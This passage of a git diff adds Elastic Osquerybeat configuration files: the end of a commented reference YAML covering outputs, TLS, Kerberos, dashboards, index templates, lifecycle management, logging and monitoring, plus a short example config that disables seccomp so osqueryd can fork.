["system.process.cgroup.id"] +# match_pids: ["process.pid", "process.ppid"] +# match_source: true +# match_source_index: 4 +# match_short_id: false +# cleanup_timeout: 60 +# labels.dedot: false +# # To connect to Docker over TLS you must specify a client and CA certificate. +# #ssl: +# # certificate_authority: "/etc/pki/root/ca.pem" +# # certificate: "/etc/pki/client/cert.pem" +# # key: "/etc/pki/client/cert.key" +# +# The following example enriches each event with docker metadata, it matches +# container id from log path available in `source` field (by default it expects +# it to be /var/lib/docker/containers/*/*.log). +# +#processors: +# - add_docker_metadata: ~ +# +# The following example enriches each event with host metadata. +# +#processors: +# - add_host_metadata: ~ +# +# The following example enriches each event with process metadata using +# process IDs included in the event. +# +#processors: +# - add_process_metadata: +# match_pids: ["system.process.ppid"] +# target: system.process.parent +# +# The following example decodes fields containing JSON strings +# and replaces the strings with valid JSON objects. +# +#processors: +# - decode_json_fields: +# fields: ["field1", "field2", ...] +# process_array: false +# max_depth: 1 +# target: "" +# overwrite_keys: false +# +#processors: +# - decompress_gzip_field: +# from: "field1" +# to: "field2" +# ignore_missing: false +# fail_on_error: true +# +# The following example copies the value of message to message_copied +# +#processors: +# - copy_fields: +# fields: +# - from: message +# to: message_copied +# fail_on_error: true +# ignore_missing: false +# +# The following example truncates the value of message to 1024 bytes +# +#processors: +# - truncate_fields: +# fields: +# - message +# max_bytes: 1024 +# fail_on_error: false +# ignore_missing: true +# +# The following example preserves the raw message under event.original +# +#processors: +# - copy_fields: +# fields: +# - from: message +# to: event.original +# fail_on_error: false +# ignore_missing: true +# - truncate_fields: +# fields: +# - event.original +# max_bytes: 1024 +# fail_on_error: false +# ignore_missing: true +# +# The following example URL-decodes the value of field1 to field2 +# +#processors: +# - urldecode: +# fields: +# - from: "field1" +# to: "field2" +# ignore_missing: false +# fail_on_error: true + +# =============================== Elastic Cloud ================================ + +# These settings simplify using Osquerybeat with the Elastic Cloud (https://cloud.elastic.co/). + +# The cloud.id setting overwrites the `output.elasticsearch.hosts` and +# `setup.kibana.host` options. +# You can find the `cloud.id` in the Elastic Cloud web UI. +#cloud.id: + +# The cloud.auth setting overwrites the `output.elasticsearch.username` and +# `output.elasticsearch.password` settings. The format is `:`. +#cloud.auth: + +# ================================== Outputs =================================== + +# Configure what output to use when sending the data collected by the beat. + +# ---------------------------- Elasticsearch Output ---------------------------- +output.elasticsearch: + # Boolean flag to enable or disable the output module. + #enabled: true + + # Array of hosts to connect to. + # Scheme and port can be left out and will be set to the default (http and 9200) + # In case you specify and additional path, the scheme is required: http://localhost:9200/path + # IPv6 addresses should always be defined as: https://[2001:db8::1]:9200 + hosts: ["localhost:9200"] + + # Set gzip compression level. + #compression_level: 0 + + # Configure escaping HTML symbols in strings. + #escape_html: false + + # Protocol - either `http` (default) or `https`. + #protocol: "https" + + # Authentication credentials - either API key or username/password. + #api_key: "id:api_key" + #username: "elastic" + #password: "changeme" + + # Dictionary of HTTP parameters to pass within the URL with index operations. + #parameters: + #param1: value1 + #param2: value2 + + # Number of workers per Elasticsearch host. + #worker: 1 + + # Optional index name. The default is "osquerybeat" plus date + # and generates [osquerybeat-]YYYY.MM.DD keys. + # In case you modify this pattern you must update setup.template.name and setup.template.pattern accordingly. + #index: "osquerybeat-%{[agent.version]}-%{+yyyy.MM.dd}" + + # Optional ingest node pipeline. By default no pipeline will be used. + #pipeline: "" + + # Optional HTTP path + #path: "/elasticsearch" + + # Custom HTTP headers to add to each request + #headers: + # X-My-Header: Contents of the header + + # Proxy server URL + #proxy_url: http://proxy:3128 + + # Whether to disable proxy settings for outgoing connections. If true, this + # takes precedence over both the proxy_url field and any environment settings + # (HTTP_PROXY, HTTPS_PROXY). The default is false. + #proxy_disable: false + + # The number of times a particular Elasticsearch index operation is attempted. If + # the indexing operation doesn't succeed after this many retries, the events are + # dropped. The default is 3. + #max_retries: 3 + + # The maximum number of events to bulk in a single Elasticsearch bulk API index request. + # The default is 50. + #bulk_max_size: 50 + + # The number of seconds to wait before trying to reconnect to Elasticsearch + # after a network error. After waiting backoff.init seconds, the Beat + # tries to reconnect. If the attempt fails, the backoff timer is increased + # exponentially up to backoff.max. After a successful connection, the backoff + # timer is reset. The default is 1s. + #backoff.init: 1s + + # The maximum number of seconds to wait before attempting to connect to + # Elasticsearch after a network error. The default is 60s. + #backoff.max: 60s + + # Configure HTTP request timeout before failing a request to Elasticsearch. + #timeout: 90 + + # Use SSL settings for HTTPS. + #ssl.enabled: true + + # Controls the verification of certificates. Valid values are: + # * full, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. + # * strict, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. If the Subject Alternative + # Name is empty, it returns an error. + # * certificate, which verifies that the provided certificate is signed by a + # trusted authority (CA), but does not perform any hostname verification. + # * none, which performs no verification of the server's certificate. This + # mode disables many of the security benefits of SSL/TLS and should only be used + # after very careful consideration. It is primarily intended as a temporary + # diagnostic mechanism when attempting to resolve TLS errors; its use in + # production environments is strongly discouraged. + # The default value is full. + #ssl.verification_mode: full + + # List of supported/valid TLS versions. By default all TLS versions from 1.1 + # up to 1.3 are enabled. + #ssl.supported_protocols: [TLSv1.1, TLSv1.2, TLSv1.3] + + # List of root certificates for HTTPS server verifications + #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] + + # Certificate for SSL client authentication + #ssl.certificate: "/etc/pki/client/cert.pem" + + # Client certificate key + #ssl.key: "/etc/pki/client/cert.key" + + # Optional passphrase for decrypting the certificate key. + #ssl.key_passphrase: '' + + # Configure cipher suites to be used for SSL connections + #ssl.cipher_suites: [] + + # Configure curve types for ECDHE-based cipher suites + #ssl.curve_types: [] + + # Configure what types of renegotiation are supported. Valid options are + # never, once, and freely. Default is never. + #ssl.renegotiation: never + + # Configure a pin that can be used to do extra validation of the verified certificate chain, + # this allow you to ensure that a specific certificate is used to validate the chain of trust. + # + # The pin is a base64 encoded string of the SHA-256 fingerprint. + #ssl.ca_sha256: "" + + # Enable Kerberos support. Kerberos is automatically enabled if any Kerberos setting is set. + #kerberos.enabled: true + + # Authentication type to use with Kerberos. Available options: keytab, password. + #kerberos.auth_type: password + + # Path to the keytab file. It is used when auth_type is set to keytab. + #kerberos.keytab: /etc/elastic.keytab + + # Path to the Kerberos configuration. + #kerberos.config_path: /etc/krb5.conf + + # Name of the Kerberos user. + #kerberos.username: elastic + + # Password of the Kerberos user. It is used when auth_type is set to password. + #kerberos.password: changeme + + # Kerberos realm. + #kerberos.realm: ELASTIC + +# ------------------------------ Logstash Output ------------------------------- +#output.logstash: + # Boolean flag to enable or disable the output module. + #enabled: true + + # The Logstash hosts + #hosts: ["localhost:5044"] + + # Number of workers per Logstash host. + #worker: 1 + + # Set gzip compression level. + #compression_level: 3 + + # Configure escaping HTML symbols in strings. + #escape_html: false + + # Optional maximum time to live for a connection to Logstash, after which the + # connection will be re-established. A value of `0s` (the default) will + # disable this feature. + # + # Not yet supported for async connections (i.e. with the "pipelining" option set) + #ttl: 30s + + # Optionally load-balance events between Logstash hosts. Default is false. + #loadbalance: false + + # Number of batches to be sent asynchronously to Logstash while processing + # new batches. + #pipelining: 2 + + # If enabled only a subset of events in a batch of events is transferred per + # transaction. The number of events to be sent increases up to `bulk_max_size` + # if no error is encountered. + #slow_start: false + + # The number of seconds to wait before trying to reconnect to Logstash + # after a network error. After waiting backoff.init seconds, the Beat + # tries to reconnect. If the attempt fails, the backoff timer is increased + # exponentially up to backoff.max. After a successful connection, the backoff + # timer is reset. The default is 1s. + #backoff.init: 1s + + # The maximum number of seconds to wait before attempting to connect to + # Logstash after a network error. The default is 60s. + #backoff.max: 60s + + # Optional index name. The default index name is set to osquerybeat + # in all lowercase. + #index: 'osquerybeat' + + # SOCKS5 proxy server URL + #proxy_url: socks5://user:password@socks5-server:2233 + + # Resolve names locally when using a proxy server. Defaults to false. + #proxy_use_local_resolver: false + + # Use SSL settings for HTTPS. + #ssl.enabled: true + + # Controls the verification of certificates. Valid values are: + # * full, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. + # * strict, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. If the Subject Alternative + # Name is empty, it returns an error. + # * certificate, which verifies that the provided certificate is signed by a + # trusted authority (CA), but does not perform any hostname verification. + # * none, which performs no verification of the server's certificate. This + # mode disables many of the security benefits of SSL/TLS and should only be used + # after very careful consideration. It is primarily intended as a temporary + # diagnostic mechanism when attempting to resolve TLS errors; its use in + # production environments is strongly discouraged. + # The default value is full. + #ssl.verification_mode: full + + # List of supported/valid TLS versions. By default all TLS versions from 1.1 + # up to 1.3 are enabled. + #ssl.supported_protocols: [TLSv1.1, TLSv1.2, TLSv1.3] + + # List of root certificates for HTTPS server verifications + #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] + + # Certificate for SSL client authentication + #ssl.certificate: "/etc/pki/client/cert.pem" + + # Client certificate key + #ssl.key: "/etc/pki/client/cert.key" + + # Optional passphrase for decrypting the certificate key. + #ssl.key_passphrase: '' + + # Configure cipher suites to be used for SSL connections + #ssl.cipher_suites: [] + + # Configure curve types for ECDHE-based cipher suites + #ssl.curve_types: [] + + # Configure what types of renegotiation are supported. Valid options are + # never, once, and freely. Default is never. + #ssl.renegotiation: never + + # Configure a pin that can be used to do extra validation of the verified certificate chain, + # this allow you to ensure that a specific certificate is used to validate the chain of trust. + # + # The pin is a base64 encoded string of the SHA-256 fingerprint. + #ssl.ca_sha256: "" + + # The number of times to retry publishing an event after a publishing failure. + # After the specified number of retries, the events are typically dropped. + # Some Beats, such as Filebeat and Winlogbeat, ignore the max_retries setting + # and retry until all events are published. Set max_retries to a value less + # than 0 to retry until all events are published. The default is 3. + #max_retries: 3 + + # The maximum number of events to bulk in a single Logstash request. The + # default is 2048. + #bulk_max_size: 2048 + + # The number of seconds to wait for responses from the Logstash server before + # timing out. The default is 30s. + #timeout: 30s + + + + +# ------------------------------- Console Output ------------------------------- +#output.console: + # Boolean flag to enable or disable the output module. + #enabled: true + + # Configure JSON encoding + #codec.json: + # Pretty-print JSON event + #pretty: false + + # Configure escaping HTML symbols in strings. + #escape_html: false + +# =================================== Paths ==================================== + +# The home path for the Osquerybeat installation. This is the default base path +# for all other path settings and for miscellaneous files that come with the +# distribution (for example, the sample dashboards). +# If not set by a CLI flag or in the configuration file, the default for the +# home path is the location of the binary. +#path.home: + +# The configuration path for the Osquerybeat installation. This is the default +# base path for configuration files, including the main YAML configuration file +# and the Elasticsearch template file. If not set by a CLI flag or in the +# configuration file, the default for the configuration path is the home path. +#path.config: ${path.home} + +# The data path for the Osquerybeat installation. This is the default base path +# for all the files in which Osquerybeat needs to store its data. If not set by a +# CLI flag or in the configuration file, the default for the data path is a data +# subdirectory inside the home path. +#path.data: ${path.home}/data + +# The logs path for a Osquerybeat installation. This is the default location for +# the Beat's log files. If not set by a CLI flag or in the configuration file, +# the default for the logs path is a logs subdirectory inside the home path. +#path.logs: ${path.home}/logs + +# ================================== Keystore ================================== + +# Location of the Keystore containing the keys and their sensitive values. +#keystore.path: "${path.config}/beats.keystore" + +# ================================= Dashboards ================================= + +# These settings control loading the sample dashboards to the Kibana index. Loading +# the dashboards are disabled by default and can be enabled either by setting the +# options here, or by using the `-setup` CLI flag or the `setup` command. +#setup.dashboards.enabled: false + +# The directory from where to read the dashboards. The default is the `kibana` +# folder in the home path. +#setup.dashboards.directory: ${path.home}/kibana + +# The URL from where to download the dashboards archive. It is used instead of +# the directory if it has a value. +#setup.dashboards.url: + +# The file archive (zip file) from where to read the dashboards. It is used instead +# of the directory when it has a value. +#setup.dashboards.file: + +# In case the archive contains the dashboards from multiple Beats, this lets you +# select which one to load. You can load all the dashboards in the archive by +# setting this to the empty string. +#setup.dashboards.beat: osquerybeat + +# The name of the Kibana index to use for setting the configuration. Default is ".kibana" +#setup.dashboards.kibana_index: .kibana + +# The Elasticsearch index name. This overwrites the index name defined in the +# dashboards and index pattern. Example: testbeat-* +#setup.dashboards.index: + +# Always use the Kibana API for loading the dashboards instead of autodetecting +# how to install the dashboards by first querying Elasticsearch. +#setup.dashboards.always_kibana: false + +# If true and Kibana is not reachable at the time when dashboards are loaded, +# it will retry to reconnect to Kibana instead of exiting with an error. +#setup.dashboards.retry.enabled: false + +# Duration interval between Kibana connection retries. +#setup.dashboards.retry.interval: 1s + +# Maximum number of retries before exiting with an error, 0 for unlimited retrying. +#setup.dashboards.retry.maximum: 0 + +# ================================== Template ================================== + +# A template is used to set the mapping in Elasticsearch +# By default template loading is enabled and the template is loaded. +# These settings can be adjusted to load your own template or overwrite existing ones. + +# Set to false to disable template loading. +#setup.template.enabled: true + +# Select the kind of index template. From Elasticsearch 7.8, it is possible to +# use component templates. Available options: legacy, component, index. +# By default osquerybeat uses the legacy index templates. +#setup.template.type: legacy + +# Template name. By default the template name is "osquerybeat-%{[agent.version]}" +# The template name and pattern has to be set in case the Elasticsearch index pattern is modified. +#setup.template.name: "osquerybeat-%{[agent.version]}" + +# Template pattern. By default the template pattern is "-%{[agent.version]}-*" to apply to the default index settings. +# The first part is the version of the beat and then -* is used to match all daily indices. +# The template name and pattern has to be set in case the Elasticsearch index pattern is modified. +#setup.template.pattern: "osquerybeat-%{[agent.version]}-*" + +# Path to fields.yml file to generate the template +#setup.template.fields: "${path.config}/fields.yml" + +# A list of fields to be added to the template and Kibana index pattern. Also +# specify setup.template.overwrite: true to overwrite the existing template. +#setup.template.append_fields: +#- name: field_name +# type: field_type + +# Enable JSON template loading. If this is enabled, the fields.yml is ignored. +#setup.template.json.enabled: false + +# Path to the JSON template file +#setup.template.json.path: "${path.config}/template.json" + +# Name under which the template is stored in Elasticsearch +#setup.template.json.name: "" + +# Overwrite existing template +# Do not enable this option for more than one instance of osquerybeat as it might +# overload your Elasticsearch with too many update requests. +#setup.template.overwrite: false + +# Elasticsearch template settings +setup.template.settings: + + # A dictionary of settings to place into the settings.index dictionary + # of the Elasticsearch template. For more details, please check + # https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping.html + #index: + #number_of_shards: 1 + #codec: best_compression + + # A dictionary of settings for the _source field. For more details, please check + # https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html + #_source: + #enabled: false + +# ====================== Index Lifecycle Management (ILM) ====================== + +# Configure index lifecycle management (ILM). These settings create a write +# alias and add additional settings to the index template. When ILM is enabled, +# output.elasticsearch.index is ignored, and the write alias is used to set the +# index name. + +# Enable ILM support. Valid values are true, false, and auto. When set to auto +# (the default), the Beat uses index lifecycle management when it connects to a +# cluster that supports ILM; otherwise, it creates daily indices. +#setup.ilm.enabled: auto + +# Set the prefix used in the index lifecycle write alias name. The default alias +# name is 'osquerybeat-%{[agent.version]}'. +#setup.ilm.rollover_alias: 'osquerybeat' + +# Set the rollover index pattern. The default is "%{now/d}-000001". +#setup.ilm.pattern: "{now/d}-000001" + +# Set the lifecycle policy name. The default policy name is +# 'beatname'. +#setup.ilm.policy_name: "mypolicy" + +# The path to a JSON file that contains a lifecycle policy configuration. Used +# to load your own lifecycle policy. +#setup.ilm.policy_file: + +# Disable the check for an existing lifecycle policy. The default is true. If +# you disable this check, set setup.ilm.overwrite: true so the lifecycle policy +# can be installed. +#setup.ilm.check_exists: true + +# Overwrite the lifecycle policy at startup. The default is false. +#setup.ilm.overwrite: false + +# =================================== Kibana =================================== + +# Starting with Beats version 6.0.0, the dashboards are loaded via the Kibana API. +# This requires a Kibana endpoint configuration. +setup.kibana: + + # Kibana Host + # Scheme and port can be left out and will be set to the default (http and 5601) + # In case you specify and additional path, the scheme is required: http://localhost:5601/path + # IPv6 addresses should always be defined as: https://[2001:db8::1]:5601 + #host: "localhost:5601" + + # Optional protocol and basic auth credentials. + #protocol: "https" + #username: "elastic" + #password: "changeme" + + # Optional HTTP path + #path: "" + + # Optional Kibana space ID. + #space.id: "" + + # Custom HTTP headers to add to each request + #headers: + # X-My-Header: Contents of the header + + # Use SSL settings for HTTPS. + #ssl.enabled: true + + # Controls the verification of certificates. Valid values are: + # * full, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. + # * strict, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. If the Subject Alternative + # Name is empty, it returns an error. + # * certificate, which verifies that the provided certificate is signed by a + # trusted authority (CA), but does not perform any hostname verification. + # * none, which performs no verification of the server's certificate. This + # mode disables many of the security benefits of SSL/TLS and should only be used + # after very careful consideration. It is primarily intended as a temporary + # diagnostic mechanism when attempting to resolve TLS errors; its use in + # production environments is strongly discouraged. + # The default value is full. + #ssl.verification_mode: full + + # List of supported/valid TLS versions. By default all TLS versions from 1.1 + # up to 1.3 are enabled. + #ssl.supported_protocols: [TLSv1.1, TLSv1.2, TLSv1.3] + + # List of root certificates for HTTPS server verifications + #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] + + # Certificate for SSL client authentication + #ssl.certificate: "/etc/pki/client/cert.pem" + + # Client certificate key + #ssl.key: "/etc/pki/client/cert.key" + + # Optional passphrase for decrypting the certificate key. + #ssl.key_passphrase: '' + + # Configure cipher suites to be used for SSL connections + #ssl.cipher_suites: [] + + # Configure curve types for ECDHE-based cipher suites + #ssl.curve_types: [] + + # Configure what types of renegotiation are supported. Valid options are + # never, once, and freely. Default is never. + #ssl.renegotiation: never + + # Configure a pin that can be used to do extra validation of the verified certificate chain, + # this allow you to ensure that a specific certificate is used to validate the chain of trust. + # + # The pin is a base64 encoded string of the SHA-256 fingerprint. + #ssl.ca_sha256: "" + + +# ================================== Logging =================================== + +# There are four options for the log output: file, stderr, syslog, eventlog +# The file output is the default. + +# Sets log level. The default log level is info. +# Available log levels are: error, warning, info, debug +#logging.level: info + +# Enable debug output for selected components. To enable all selectors use ["*"] +# Other available selectors are "beat", "publisher", "service" +# Multiple selectors can be chained. +#logging.selectors: [ ] + +# Send all logging output to stderr. The default is false. +#logging.to_stderr: false + +# Send all logging output to syslog. The default is false. +#logging.to_syslog: false + +# Send all logging output to Windows Event Logs. The default is false. +#logging.to_eventlog: false + +# If enabled, Osquerybeat periodically logs its internal metrics that have changed +# in the last period. For each metric that changed, the delta from the value at +# the beginning of the period is logged. Also, the total values for +# all non-zero internal metrics are logged on shutdown. The default is true. +#logging.metrics.enabled: true + +# The period after which to log the internal metrics. The default is 30s. +#logging.metrics.period: 30s + +# Logging to rotating files. Set logging.to_files to false to disable logging to +# files. +logging.to_files: true +logging.files: + # Configure the path where the logs are written. The default is the logs directory + # under the home path (the binary location). + #path: /var/log/osquerybeat + + # The name of the files where the logs are written to. + #name: osquerybeat + + # Configure log file size limit. If limit is reached, log file will be + # automatically rotated + #rotateeverybytes: 10485760 # = 10MB + + # Number of rotated log files to keep. Oldest files will be deleted first. + #keepfiles: 7 + + # The permissions mask to apply when rotating log files. The default value is 0600. + # Must be a valid Unix-style file permissions mask expressed in octal notation. + #permissions: 0600 + + # Enable log file rotation on time intervals in addition to size-based rotation. + # Intervals must be at least 1s. Values of 1m, 1h, 24h, 7*24h, 30*24h, and 365*24h + # are boundary-aligned with minutes, hours, days, weeks, months, and years as + # reported by the local system clock. All other intervals are calculated from the + # Unix epoch. Defaults to disabled. + #interval: 0 + + # Rotate existing logs on startup rather than appending to the existing + # file. Defaults to true. + # rotateonstartup: true + +# Set to true to log messages in JSON format. +#logging.json: false + +# Set to true, to log messages with minimal required Elastic Common Schema (ECS) +# information. Recommended to use in combination with `logging.json=true` +# Defaults to false. +#logging.ecs: false + +# ============================= X-Pack Monitoring ============================== +# Osquerybeat can export internal metrics to a central Elasticsearch monitoring +# cluster. This requires xpack monitoring to be enabled in Elasticsearch. The +# reporting is disabled by default. + +# Set to true to enable the monitoring reporter. +#monitoring.enabled: false + +# Sets the UUID of the Elasticsearch cluster under which monitoring data for this +# Osquerybeat instance will appear in the Stack Monitoring UI. If output.elasticsearch +# is enabled, the UUID is derived from the Elasticsearch cluster referenced by output.elasticsearch. +#monitoring.cluster_uuid: + +# Uncomment to send the metrics to Elasticsearch. Most settings from the +# Elasticsearch output are accepted here as well. +# Note that the settings should point to your Elasticsearch *monitoring* cluster. +# Any setting that is not set is automatically inherited from the Elasticsearch +# output configuration, so if you have the Elasticsearch output configured such +# that it is pointing to your Elasticsearch monitoring cluster, you can simply +# uncomment the following line. +#monitoring.elasticsearch: + + # Array of hosts to connect to. + # Scheme and port can be left out and will be set to the default (http and 9200) + # In case you specify and additional path, the scheme is required: http://localhost:9200/path + # IPv6 addresses should always be defined as: https://[2001:db8::1]:9200 + #hosts: ["localhost:9200"] + + # Set gzip compression level. + #compression_level: 0 + + # Protocol - either `http` (default) or `https`. + #protocol: "https" + + # Authentication credentials - either API key or username/password. + #api_key: "id:api_key" + #username: "beats_system" + #password: "changeme" + + # Dictionary of HTTP parameters to pass within the URL with index operations. + #parameters: + #param1: value1 + #param2: value2 + + # Custom HTTP headers to add to each request + #headers: + # X-My-Header: Contents of the header + + # Proxy server url + #proxy_url: http://proxy:3128 + + # The number of times a particular Elasticsearch index operation is attempted. If + # the indexing operation doesn't succeed after this many retries, the events are + # dropped. The default is 3. + #max_retries: 3 + + # The maximum number of events to bulk in a single Elasticsearch bulk API index request. + # The default is 50. + #bulk_max_size: 50 + + # The number of seconds to wait before trying to reconnect to Elasticsearch + # after a network error. After waiting backoff.init seconds, the Beat + # tries to reconnect. If the attempt fails, the backoff timer is increased + # exponentially up to backoff.max. After a successful connection, the backoff + # timer is reset. The default is 1s. + #backoff.init: 1s + + # The maximum number of seconds to wait before attempting to connect to + # Elasticsearch after a network error. The default is 60s. + #backoff.max: 60s + + # Configure HTTP request timeout before failing an request to Elasticsearch. + #timeout: 90 + + # Use SSL settings for HTTPS. + #ssl.enabled: true + + # Controls the verification of certificates. Valid values are: + # * full, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. + # * strict, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. If the Subject Alternative + # Name is empty, it returns an error. + # * certificate, which verifies that the provided certificate is signed by a + # trusted authority (CA), but does not perform any hostname verification. + # * none, which performs no verification of the server's certificate. This + # mode disables many of the security benefits of SSL/TLS and should only be used + # after very careful consideration. It is primarily intended as a temporary + # diagnostic mechanism when attempting to resolve TLS errors; its use in + # production environments is strongly discouraged. + # The default value is full. + #ssl.verification_mode: full + + # List of supported/valid TLS versions. By default all TLS versions from 1.1 + # up to 1.3 are enabled. + #ssl.supported_protocols: [TLSv1.1, TLSv1.2, TLSv1.3] + + # List of root certificates for HTTPS server verifications + #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] + + # Certificate for SSL client authentication + #ssl.certificate: "/etc/pki/client/cert.pem" + + # Client certificate key + #ssl.key: "/etc/pki/client/cert.key" + + # Optional passphrase for decrypting the certificate key. + #ssl.key_passphrase: '' + + # Configure cipher suites to be used for SSL connections + #ssl.cipher_suites: [] + + # Configure curve types for ECDHE-based cipher suites + #ssl.curve_types: [] + + # Configure what types of renegotiation are supported. Valid options are + # never, once, and freely. Default is never. + #ssl.renegotiation: never + + # Configure a pin that can be used to do extra validation of the verified certificate chain, + # this allow you to ensure that a specific certificate is used to validate the chain of trust. + # + # The pin is a base64 encoded string of the SHA-256 fingerprint. + #ssl.ca_sha256: "" + + # Enable Kerberos support. Kerberos is automatically enabled if any Kerberos setting is set. + #kerberos.enabled: true + + # Authentication type to use with Kerberos. Available options: keytab, password. + #kerberos.auth_type: password + + # Path to the keytab file. It is used when auth_type is set to keytab. + #kerberos.keytab: /etc/elastic.keytab + + # Path to the Kerberos configuration. + #kerberos.config_path: /etc/krb5.conf + + # Name of the Kerberos user. + #kerberos.username: elastic + + # Password of the Kerberos user. It is used when auth_type is set to password. + #kerberos.password: changeme + + # Kerberos realm. + #kerberos.realm: ELASTIC + + #metrics.period: 10s + #state.period: 1m + +# The `monitoring.cloud.id` setting overwrites the `monitoring.elasticsearch.hosts` +# setting. You can find the value for this setting in the Elastic Cloud web UI. +#monitoring.cloud.id: + +# The `monitoring.cloud.auth` setting overwrites the `monitoring.elasticsearch.username` +# and `monitoring.elasticsearch.password` settings. The format is `:`. +#monitoring.cloud.auth: + +# =============================== HTTP Endpoint ================================ + +# Each beat can expose internal metrics through a HTTP endpoint. For security +# reasons the endpoint is disabled by default. This feature is currently experimental. +# Stats can be access through http://localhost:5066/stats . For pretty JSON output +# append ?pretty to the URL. + +# Defines if the HTTP endpoint is enabled. +#http.enabled: false + +# The HTTP endpoint will bind to this hostname, IP address, unix socket or named pipe. +# When using IP addresses, it is recommended to only use localhost. +#http.host: localhost + +# Port on which the HTTP endpoint will bind. Default is 5066. +#http.port: 5066 + +# Define which user should be owning the named pipe. +#http.named_pipe.user: + +# Define which the permissions that should be applied to the named pipe, use the Security +# Descriptor Definition Language (SDDL) to define the permission. This option cannot be used with +# `http.user`. +#http.named_pipe.security_descriptor: + +# ============================== Process Security ============================== + +# Enable or disable seccomp system call filtering on Linux. Default is enabled. +#seccomp.enabled: true + +# ============================== Instrumentation =============================== + +# Instrumentation support for the osquerybeat. +#instrumentation: + # Set to true to enable instrumentation of osquerybeat. + #enabled: false + + # Environment in which osquerybeat is running on (eg: staging, production, etc.) + #environment: "" + + # APM Server hosts to report instrumentation results to. + #hosts: + # - http://localhost:8200 + + # API Key for the APM Server(s). + # If api_key is set then secret_token will be ignored. + #api_key: + + # Secret token for the APM Server(s). + #secret_token: + + # Enable profiling of the server, recording profile samples as events. + # + # This feature is experimental. + #profiling: + #cpu: + # Set to true to enable CPU profiling. + #enabled: false + #interval: 60s + #duration: 10s + #heap: + # Set to true to enable heap profiling. + #enabled: false + #interval: 60s + +# ================================= Migration ================================== + +# This allows to enable 6.7 migration aliases +#migration.6_to_7.enabled: false + diff --git a/x-pack/osquerybeat/osquerybeat.yml b/x-pack/osquerybeat/osquerybeat.yml new file mode 100644 index 00000000000..482ca5324fa --- /dev/null +++ b/x-pack/osquerybeat/osquerybeat.yml @@ -0,0 +1,177 @@ +################### Osquerybeat Configuration Example ######################### + +############################# Osquerybeat ###################################### + +osquerybeat: +# inputs: +# - type: osquery +# streams: +# - id: "E169F085-AC8B-48AF-9355-D2977030CE24" +# query: "select * from users" +# - id: "CFDE1EAA-0C6C-4D19-9EEC-45802B2A8C01" +# query: "select * from processes" +# interval: 1m + +# ============================== Process Security ============================== +# Disable seccomp system call filtering on Linux. +# Otherwise osquerybeat can't fork osqueryd with error: Failed to start osqueryd process: fork/exec ./osqueryd: operation not permitted +seccomp.enabled: false + +# ================================== General =================================== + +# The name of the shipper that publishes the network data. It can be used to group +# all the transactions sent by a single shipper in the web interface. +#name: + +# The tags of the shipper are included in their own field with each +# transaction published. +#tags: ["service-X", "web-tier"] + +# Optional fields that you can specify to add additional information to the +# output. +#fields: +# env: staging + +# ================================= Dashboards ================================= +# These settings control loading the sample dashboards to the Kibana index. Loading +# the dashboards is disabled by default and can be enabled either by setting the +# options here or by using the `setup` command. +#setup.dashboards.enabled: false + +# The URL from where to download the dashboards archive. By default this URL +# has a value which is computed based on the Beat name and version. For released +# versions, this URL points to the dashboard archive on the artifacts.elastic.co +# website. +#setup.dashboards.url: + +# =================================== Kibana =================================== + +# Starting with Beats version 6.0.0, the dashboards are loaded via the Kibana API. +# This requires a Kibana endpoint configuration. +setup.kibana: + + # Kibana Host + # Scheme and port can be left out and will be set to the default (http and 5601) + # In case you specify and additional path, the scheme is required: http://localhost:5601/path + # IPv6 addresses should always be defined as: https://[2001:db8::1]:5601 + #host: "localhost:5601" + + # Kibana Space ID + # ID of the Kibana Space into which the dashboards should be loaded. By default, + # the Default Space will be used. + #space.id: + +# =============================== Elastic Cloud ================================ + +# These settings simplify using Osquerybeat with the Elastic Cloud (https://cloud.elastic.co/). + +# The cloud.id setting overwrites the `output.elasticsearch.hosts` and +# `setup.kibana.host` options. +# You can find the `cloud.id` in the Elastic Cloud web UI. +#cloud.id: + +# The cloud.auth setting overwrites the `output.elasticsearch.username` and +# `output.elasticsearch.password` settings. The format is `:`. +#cloud.auth: + +# ================================== Outputs =================================== + +# Configure what output to use when sending the data collected by the beat. + +# ---------------------------- Elasticsearch Output ---------------------------- +output.elasticsearch: + # Array of hosts to connect to. + hosts: ["localhost:9200"] + + # Protocol - either `http` (default) or `https`. + #protocol: "https" + + # Authentication credentials - either API key or username/password. + #api_key: "id:api_key" + #username: "elastic" + #password: "changeme" + +# ------------------------------ Logstash Output ------------------------------- +#output.logstash: + # The Logstash hosts + #hosts: ["localhost:5044"] + + # Optional SSL. By default is off. + # List of root certificates for HTTPS server verifications + #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] + + # Certificate for SSL client authentication + #ssl.certificate: "/etc/pki/client/cert.pem" + + # Client Certificate Key + #ssl.key: "/etc/pki/client/cert.key" + +# ================================= Processors ================================= + +# Configure processors to enhance or manipulate events generated by the beat. + +processors: + - add_host_metadata: ~ + - add_cloud_metadata: ~ + + +# ================================== Logging =================================== + +# Sets log level. The default log level is info. +# Available log levels are: error, warning, info, debug +#logging.level: debug + +# At debug level, you can selectively enable logging only for some components. +# To enable all selectors use ["*"]. Examples of other selectors are "beat", +# "publisher", "service". +#logging.selectors: ["*"] + +# ============================= X-Pack Monitoring ============================== +# Osquerybeat can export internal metrics to a central Elasticsearch monitoring +# cluster. This requires xpack monitoring to be enabled in Elasticsearch. The +# reporting is disabled by default. + +# Set to true to enable the monitoring reporter. +#monitoring.enabled: false + +# 